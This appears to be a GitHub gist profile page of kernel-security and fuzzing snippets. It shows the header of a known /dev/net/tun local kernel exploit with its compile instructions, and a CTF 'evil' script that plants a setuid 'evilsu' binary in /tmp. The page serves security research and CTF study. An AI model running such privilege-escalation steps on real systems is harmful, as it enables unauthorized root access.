Skip to content

Instantly share code, notes, and snippets.

View brant-ruan's full-sized avatar
:octocat:
不要尖叫

Bonan Ruan brant-ruan

:octocat:
不要尖叫
View GitHub Profile
// gcc -o test_kcov test_kcov.c -static
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
// KCOV IOCTL 定义
@brant-ruan
brant-ruan / exploit.c
Created September 13, 2022 16:19
https://www.grsecurity.net/~spender/exploits/cheddar_bay/exploit.c, modified by Bonan to run on Ubuntu 9.10 with recompiled 2.6.31 kernel
/* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun
A vulnerability which, when viewed at the source level, is unexploitable!
But which, thanks to gcc optimizations, becomes exploitable :)
Also, bypass of mmap_min_addr via SELinux vulnerability!
(where having SELinux enabled actually increases your risk against a
large class of kernel vulnerabilities)
for 2.6.30 without SELinux enabled, compile with:
cc -fPIC -fno-stack-protector -shared -o exploit.so exploit.c
(on a 64bit system -m64 may be necessary to compile a 64bit .so)
@brant-ruan
brant-ruan / evil
Last active July 2, 2024 18:37
[exploit_bypass_kpti_with_coredump] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with coredump; no KASLR
#!/bin/sh
mv /evilsu /tmp/evilsu
chmod u+s /tmp/evilsu
chmod 777 /evilsu
#!/bin/bash
if [ "$(id -u)" -ne 0 ]; then
echo "This script must be run as root. Please use 'sudo' to run it."
exit 1
fi
if [ $# -eq 0 ]; then
echo "Usage: $0 <version>"
exit 1
@brant-ruan
brant-ruan / auth.c
Created February 18, 2024 14:26
CVE-2018-1000028 - debugging fs/nfsd/auth.c
int nfsd_setuser(struct svc_rqst *rqstp, struct svc_export *exp)
{
struct group_info *rqgi;
struct group_info *gi;
struct cred *new;
int i, j;
int flags = nfsexp_flags(rqstp, exp);
validate_process_creds();
/* CGI decoding as C program */
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
int hex_values[256];
void init_hex_values() {
Location = Tuple[str, int]
class Coverage:
"""Track coverage within a `with` block. Use as
```
with Coverage() as cov:
function_to_be_traced()
c = cov.coverage()
```
"""
@brant-ruan
brant-ruan / tfb_cgi_decode.py
Created October 28, 2023 13:29
The Fuzzing Book - cgi_decode.py
def cgi_decode(s: str) -> str:
"""Decode the CGI-encoded string `s`:
* replace '+' by ' '
* replace "%xx" by the character with hex number xx.
Return the decoded string. Raise `ValueError` for invalid inputs."""
# Mapping of hex digits to their integer values
hex_values = {
'0': 0, '1': 1, '2': 2, '3': 3, '4': 4,
'5': 5, '6': 6, '7': 7, '8': 8, '9': 9,
#!/bin/bash
# Decompress a .cpio.gz packed file system
rm -rf ./initramfs && mkdir initramfs
pushd . && pushd initramfs
cp ../initramfs.cpio.gz .
gzip -dc initramfs.cpio.gz | cpio -idm &>/dev/null && rm initramfs.cpio.gz
popd
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/io.h>
#include <sys/mman.h>